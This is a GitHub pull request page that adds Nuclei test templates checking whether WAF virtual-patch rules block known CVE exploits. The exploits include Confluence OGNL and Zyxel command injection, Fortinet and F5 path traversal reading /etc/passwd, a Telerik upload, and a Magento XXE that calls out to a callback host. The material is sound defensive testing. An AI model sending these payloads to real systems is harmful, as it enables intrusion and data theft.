Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiples CVEs #1111

Merged
merged 23 commits into from
Sep 12, 2024
Merged
Show file tree
Hide file tree
Changes from 21 commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
9 changes: 2 additions & 7 deletions .appsec-tests/CVE-2022-22965/CVE-2022-22965.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -11,14 +11,9 @@ http:
POST {{BaseURL}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded

class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
class.module.classLoader.resources.context.configFile=http://foobar/x&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- |
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
payloads:
interact_protocol:
- "http"
- https

GET /?class.module.classLoader.resources.context.configFile=http://foobar/x&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
cookie-reuse: true
matchers:
- type: dsl
Expand Down
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2018-13379/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2018-13379.yaml
nuclei_template: test-CVE-2018-13379.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2018-13379/test-CVE-2018-13379.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@

id: test-CVE-2018-13379
info:
name: test-CVE-2018-13379
author: crowdsec
severity: info
description: test-CVE-2018-13379 testing
tags: appsec-testing
http:
- raw:
- |
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2019-18935/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-18935.yaml
nuclei_template: test-CVE-2019-18935.yaml
48 changes: 48 additions & 0 deletions .appsec-tests/vpatch-CVE-2019-18935/test-CVE-2019-18935.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@

id: test-CVE-2019-18935
info:
name: test-CVE-2019-18935
author: crowdsec
severity: info
description: test-CVE-2019-18935 testing
tags: appsec-testing
http:
- raw:
- |
POST /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=93350a62d5c3664b3c206e59a6239bdc

--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="rauPostData"

ATTu5i4R+ViNFYO6kst0jC11wM/1iqH+W/isjhaDjNtSL4i0BX6wnHZVtkSpfZ8pOxh5aIKzTO+1TvLT/S6NT0wnqIPU8UuGifJAcamKaU3Hm3xkpSieQn7Ut23zqL8/tEKW7qut9dt4jAz7VIeyNCLLCnQ7DUiLJtSafnT/02UsqN3xHUvZuGtswm3ncaO9AayiotvEfGSXAfKmiMQ87f3BGpX8llk5vaxtWp01SU+96R9W69lBOak8gP9si9MMgUHWp5czldHYG/Y4YVPjaJRK3d1mb4J6klQpibROWV3y1PsjZ1rd5Mcb34lGlu70V3XddoXXqoYyKF+jEsSzYV76NkY755EffPmWyPvcqpjtktK5b7AEBmAIvfcMUW+PtDAGB9wRlSRAzfr2CtQVVaKA7Dvp5JjD/AzMlrxeM7Us7FK1UfwWymAFr2JzBVtLfMg2QUUEzTuqjOYXe83pAMbl6Xx3Fn7HAVdPH1/ZxBjjTPqKc5rJaFnVoV023/vtZ1/hAZ/S42f1tN5iNKhqjbsaqPvFELBGohau/7+ujM21eZuNjWMuKJZG11fjUhYdruRfPBJ2qsrKveq8a3nAnLx6dzKCNo+udhKtSgK3vIGx1yNZOf1UB+uB/v7A6b9nEFbOkC0wiFU4JLRCAHRpJymr+yZywYTs1I7lMkdIUf6JGMWpvdQwStQzcyKnY0cJYw3WXykm1vfhM1OhVYB30Mnk7zXpHHuGax6+lTxne94sEUyzCx2l+nlUvolPeD9KoBGAuEMxkUTelwdAGe34k2sA05ck/DH/z3SMb5PZj2SiJGbiNMmQofXaiFuJWOItgu+QXGKbrPMWNQBYPCcPr4S/3uIYsX2F3EY5//+zKJb/QiqIY2CaPrfUuFCcuo6+jH2i0ZeLNja3BQilnR57xemApx6lD7cmnAv1pnLDSIEdfbT6drzvtojExFaXDsXB7GEpCJia7EgL+WEpTFNRhjIa0PAntp3EOIONk4BUQSWmaK0UIBWeIwKDyIzyu6j3hjd87prF8n/5/ffhQxZpO7nW5GlBjxkfAfCZqY6I1Iw3bufK/rm6qneRUJTvYoPlVGNsUk9waG2l06hzG5DCgGabADLZpUxbPvyQ0aV/ClcZSlFiu+wZDuSD8Zq1p1QEGWIh5K2zfrbvNXVP1eeT+36Fu/ecDTXov8/HkP4Qc1I6L40BgYulRLREksYZtSnsPS57XCrXFrrpvPN6iCXeJU8qMlbDuXwzc22lppui694MRrpGNsxmFGqWxX6bkRZsTy0OUeKM01nPqVRQ2s31eZKO/280DJMy1JLr8RTzZRNImrCdE+LQv19IzzF4skVp&6R/cGaqQeHVAzdJ9wTFOyCsrMSTtqcjLe8AHwiPckPDUwecnJyNlkDYwDQpxGYQ9hs6YxhupK310sbCbtXB4H6Dz5rGNL40nkkyo4j2clmRr08jtFsPQ0RpE5BGsulPT3l0MxyAvPFMs8bMybUyAP+9RB9LoHE3Xo8BqDadX3HT1WFL4XVDQYdEAzeZHzRhIIqYqDJzJhlFZuQVQcmxxFZjrQHDv9UDm9pqpxf3U+94yYdjW9ZD5qIG0IxM/1yEtAZ7NODZhEBIhJHKLgS0XICzWydvoRhmDnIDQl907yq3y4LfOgi/Y0Q2+cCxzKEb9cpNPCFehqRU8sZKmvxzU2AF8RruYXW+Z9pB1j4gBq8w=
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="file"; filename="1576142987.918625.dll"
Content-Type: application/octet-stream
<DDL_CONTENT>
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="fileName"

1576142987.918625.dll
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="contentType"

application/octet-stream
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="lastModifiedDate"

1970-01-01T00:00:00.000Z
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="metadata"

{"TotalChunks": 1, "ChunkIndex": 0, "TotalFileSize": 1, "UploadID": "1576142987.918625.dll"}
--93350a62d5c3664b3c206e59a6239bdc--

cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2020-5902/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-5902.yaml
nuclei_template: test-CVE-2020-5902.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2020-5902/test-CVE-2020-5902.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@

id: test-CVE-2020-5902
info:
name: test-CVE-2020-5902
author: crowdsec
severity: info
description: test-CVE-2020-5902 testing
tags: appsec-testing
http:
- raw:
- |
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-26134/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-26134.yaml
nuclei_template: test-CVE-2022-26134.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-26134/test-CVE-2022-26134.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@

id: test-CVE-2022-26134
info:
name: test-CVE-2022-26134
author: crowdsec
severity: info
description: test-CVE-2022-26134 testing
tags: appsec-testing
http:
- raw:
- |
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-41082/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-41082.yaml
nuclei_template: test-CVE-2022-41082.yaml
22 changes: 22 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-41082/test-CVE-2022-41082.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@

id: test-CVE-2022-41082
info:
name: test-CVE-2022-41082
author: crowdsec
severity: info
description: test-CVE-2022-41082 testing
tags: appsec-testing
http:
- raw:
- |
GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"


5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-29973/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-29973.yaml
nuclei_template: test-CVE-2024-29973.yaml
32 changes: 32 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-29973/test-CVE-2024-29973.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: test-CVE-2024-29973
info:
name: test-CVE-2024-29973
author: crowdsec
severity: info
description: test-CVE-2024-29973 testing
tags: appsec-testing
variables:
string: "{{randstr}}"

http:
- raw:
- |
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="c0"

storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)#
------WebKitFormBoundarygcflwtei--
- |
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+"+"and+False+or+__import__(\"subprocess\").check_output(\"id\",+shell=True)%23 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
- "status_code_2 == 403"
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-34102/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-34102.yaml
nuclei_template: test-CVE-2024-34102.yaml
31 changes: 31 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-34102/test-CVE-2024-34102.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@

id: test-CVE-2024-34102
info:
name: test-CVE-2024-34102
author: crowdsec
severity: info
description: test-CVE-2024-34102 testing
tags: appsec-testing
http:
- raw:
- |
POST /rest/V1/guest-carts/1/estimate-shipping-methods/2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"<?xml version='1.0' ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM 'http://{{interactsh-url}}'> %sp; %param1; ]> <r>&exfil;</r>","options": 16}}}}}}
- |
POST /rest/V1/guest-carts/1/estimate-shipping-methods/3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
- "status_code_2 == 403"


6 changes: 3 additions & 3 deletions .github/workflows/test_appsec_rules.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -25,7 +25,7 @@ concurrency:

jobs:
run-appsec-rules-tests:
runs-on: ubuntu-20.04
runs-on: ubuntu-22.04
steps:
- name: Check out code into the Go module directory
uses: actions/checkout@v4
Expand All @@ -48,7 +48,7 @@ jobs:
sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
- name: Start OpenResty Container
run: |
docker-compose -f docker/appsec/docker-compose.yaml up -d --build
docker compose -f docker/appsec/docker-compose.yaml up -d --build
- name: run tests on last crowdsec tag
run: |
cscli hubtest run --all --appsec --debug --target http://127.0.0.1:7822
Expand All @@ -67,5 +67,5 @@ jobs:
color: ${{ env.APPSEC_RULE_BADGE_COLOR }}
- name: Stop containers
if: always()
run: docker-compose -f docker/appsec/docker-compose.yaml down
run: docker compose -f docker/appsec/docker-compose.yaml down

2 changes: 1 addition & 1 deletion .github/workflows/waf-check.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -85,7 +85,7 @@ jobs:
sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
- name: Start OpenResty Container
run: |
docker-compose -f docker/appsec/docker-compose.yaml up -d --build
docker compose -f docker/appsec/docker-compose.yaml up -d --build
sleep 3
- name: Build and Run Waf Check
run: |
Expand Down
Loading